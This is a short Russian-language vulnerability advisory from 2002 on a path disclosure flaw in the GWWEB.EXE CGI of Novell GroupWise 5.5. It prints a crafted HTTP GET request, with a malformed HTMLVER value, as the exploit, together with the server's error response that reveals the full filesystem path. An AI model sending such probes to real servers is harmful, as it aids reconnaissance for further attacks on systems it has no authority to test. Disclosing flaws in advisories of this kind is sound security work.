Раскрытие Web Root в Novell Groupwise

Дата публикации:	05.03.2002
Всего просмотров:	1098
Опасность:
Наличие исправления:
Количество уязвимостей:	1
CVE ID:	Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:	Нет данных
Наличие эксплоита:	Нет данных
Уязвимые продукты:
Описание:	GroupWise - служба каталогов от Novell для Windows платформ. По сообщениям, если отформатированный Web запрос представлен cgi процессу GWWEB.EXE, будет возвращено сообщение об ошибке. В этом сообщении будет содержаться полный путь к сценарию. Уязвимость может использоваться для организации дальнейших нападений. Уязвимость найдена в Novell Groupwise 5.5 Эксплоит: GET /cgi-bin/GW5/GWWEB.EXE?GET-CONTEXT&HTMLVER=AAA HTTP/1.0 HTTP/1.1 200 Document Follows Date: Wed, 27 Feb 2002 22:27:08 GMT Server: MIME-version: 1.0 Content-type: text/html Connection: close Could not find file SYS:\NOVONYX\SUITES~1\CGI-BIN\GW5\US\AAA\LOGIN.HTM
Ссылки:	Источник

Подпишитесь на email рассылку